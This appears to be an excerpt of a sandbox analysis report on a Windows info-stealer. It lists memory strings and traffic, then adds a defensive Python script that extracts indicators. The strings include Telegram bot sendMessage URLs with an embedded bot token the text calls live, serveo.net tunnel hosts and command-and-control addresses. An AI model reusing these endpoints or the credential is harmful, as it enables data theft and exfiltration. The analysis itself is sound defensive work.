Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8574000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD854A000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.se
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B79934000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000023.00000002.4114412277.0000019B798EF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://e2111f95f52ba8be6b2d3394e38b1722.serveo.net/
Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net
Source: ssh.exe, 00000021.00000002.4113726250.00000292607CC000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000021.00000002.4113726250.0000029260842000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://e483612b93e055308d0c85f365c474ee.serveo.net/
Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip
Source: powershell.exe, 00000001.00000002.1715254235.000000000617A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7505000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE74E0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE751D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7577000.00000004.00000800.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE757F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: vkefq4cv.oil.exe, 00000012.00000002.2068696516.0000010DE7587000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
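The string list above is what a responder actually works from, and it mixes real indicators (the 185.119.118.59:8080 panel with its .wsr report upload, the serveo.net reverse tunnels, the ip-api.com lookup, the Telegram bot token) with .NET and PowerShell module metadata and Firefox search defaults that have nothing to do with the stealer. It also carries memory-dump artifacts: ":80802" and ":80Pk" are bytes that followed the URL in memory, and several strings are cut at exactly 100 characters (the percent-encoded path, the serveo.net string and the chat_id line), so the chat_id is incomplete. The script below is an added example for this report, not Joe Sandbox code and not code from the sample. It parses lines in the format above (the fused "...sdmpString found ..." form as well as a "source | finding" form), drops allowlisted noise, decodes the percent-encoded path, extracts the bot token and flags the artifact and cut-off cases. The sample lines are copied from this section (the two Telegram lines reduced to one dump reference each); the 100-character cut-off and the benign-host allowlist are triage assumptions, not report facts.

```python
"""Triage helper for Joe Sandbox "String found in binary or memory" lines:
keeps network indicators, drops runtime/browser noise, decodes %XX paths,
pulls Telegram bot tokens and flags dump artifacts and 100-char cut-offs."""
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Lines copied from the report section above (the report fuses the source
# column into the finding, "...sdmpString found ..."; both that form and a
# "source | finding" form are accepted by LINE_RE).
SAMPLE_LINES = [
    "Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:8080/%68%6B%4C%59%57%5F%6A%6F%6E%65%73%40%34%36%38%33%32%35%5F%72%65%70%6F%72%",
    "Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8515000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.119.118.59:80802",
    "Source: vkefq4cv.oil.exe, 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://193.142.58.127:80Pk",
    "Source: vkefq4cv.oil.exe, 0000000B.00000002.4118051146.000001B8AB9E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://e2111f95f52ba8be6b2d3394e38b1722.serveo.net:6787//e2111f95f52ba8be6b2d3394e38b1722.serveo.net",
    "Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD7480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line?fields=query",
    "Source: powershell.exe, 00000001.00000002.1712328855.0000000005266000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png",
    "Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage",
    "Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD85C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot6352251597:AAF6uxZ1z4xhnUTnQP5u36WV5EeOgP0W_YY/sendMessage?chat_id=51697",
    "Source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD853B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/PowerShell/Win32-OpenSSH/releases/download/v9.2.2.0p1-Beta/OpenSSH-Win32.zip",
]

LINE_RE = re.compile(r"^Source:\s*(?P<source>.+?)\s*\|?\s*String found in binary or memory:\s*(?P<url>\S+)\s*$")
PROCESS_RE = re.compile(r"\b([\w.-]+\.exe)\b", re.IGNORECASE)
# Telegram bot tokens are "<numeric bot id>:<35 chars>"; the report shows one inline.
TELEGRAM_RE = re.compile(r"api\.telegram\.org/bot(?P<bot_id>\d+):(?P<token>[A-Za-z0-9_-]{35})")
STRING_CUTOFF = 100  # assumption: several strings in this report stop at exactly 100 characters
# Assumed triage allowlist: hosts that come from .NET / PowerShell module
# metadata and browser search defaults rather than from the stealer.
BENIGN_SUFFIXES = ("schemas.xmlsoap.org", "nuget.org", "pesterbdd.com", "apache.org", "contoso.com",
                   "aka.ms", "mozilla.org", "support.office.com", "ecosia.org", "duckduckgo.com",
                   "yahoo.com", "google.com", "upx.sf.net")
C2_CATEGORIES = {"raw_ip_endpoint", "reverse_tunnel", "telegram_api", "geoip_lookup"}


def split_host_port(netloc):
    """Return (host, port, malformed). A non-numeric or out-of-range port is
    usually bytes from the adjacent memory region, e.g. ':80Pk' or ':80802'."""
    host, sep, port_s = netloc.rpartition(":")
    if not sep:
        return netloc.lower(), None, False
    if port_s.isdigit() and 0 < int(port_s) <= 65535:
        return host.lower(), int(port_s), False
    return host.lower(), None, True


def classify(host):
    if host.endswith(".serveo.net"):
        return "reverse_tunnel"
    if host == "api.telegram.org":
        return "telegram_api"
    if host == "ip-api.com":
        return "geoip_lookup"
    try:
        return "raw_ip_endpoint" if ipaddress.ip_address(host).is_global else "private_ip"
    except ValueError:
        pass  # not an IP literal
    if any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES):
        return "benign"
    return "review"  # e.g. the OpenSSH download that feeds the serveo tunnel


def parse_line(line):
    """One report line -> record, or None if the line is not a string finding."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    url = m.group("url")
    parts = urlsplit(url)
    host, port, malformed = split_host_port(parts.netloc)
    if port is None and not malformed:
        port = {"http": 80, "https": 443}.get(parts.scheme)
    tg = TELEGRAM_RE.search(url)
    return {
        "processes": sorted({p.lower() for p in PROCESS_RE.findall(m.group("source"))}),
        "url": url,
        "decoded_url": unquote(url),  # %68%6B... -> hkLYW_...; a lone trailing '%' is kept
        "host": host,
        "port": port,
        "category": classify(host),
        "telegram_bot": (tg.group("bot_id"), tg.group("token")) if tg else None,
        "malformed_port": malformed,
        "truncated": len(url) >= STRING_CUTOFF,
    }


def extract_iocs(lines):
    """Aggregate what a responder keeps from a batch of report lines."""
    iocs = {"endpoints": set(), "telegram_bots": {}, "decoded": {}, "review": [], "suspect": [], "benign": 0}
    for rec in filter(None, map(parse_line, lines)):
        if rec["category"] == "benign":
            iocs["benign"] += 1
            continue
        if rec["category"] in C2_CATEGORIES:
            iocs["endpoints"].add(f"{rec['host']}:{rec['port']}" if rec["port"] else rec["host"])
        elif rec["category"] == "review":
            iocs["review"].append(rec["url"])
        if rec["telegram_bot"]:
            iocs["telegram_bots"][rec["telegram_bot"][0]] = rec["telegram_bot"][1]
        if rec["decoded_url"] != rec["url"]:
            iocs["decoded"][rec["url"]] = rec["decoded_url"]
        if rec["malformed_port"] or rec["truncated"]:
            iocs["suspect"].append(rec["url"])  # incomplete string: not an exact-match IOC
    return iocs
```

Run `extract_iocs(SAMPLE_LINES)` and the percent-encoded path decodes to `hkLYW_jones@468325_repor%`, the same `hkLYW_` prefix and `468325_report.wsr` pattern seen in the plain-text panel URLs. The Telegram token is a live credential for the attacker's bot, so record it for takedown and hunting rather than pasting it into third-party tools. The serveo.net hostnames are throwaway tunnel names; hunt on the behaviour this report shows (an OpenSSH download followed by ssh.exe activity referencing serveo.net) rather than on the exact host.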
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe | Window created: window name: CLIPBRDWNDCLASS (44 occurrences)
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASS
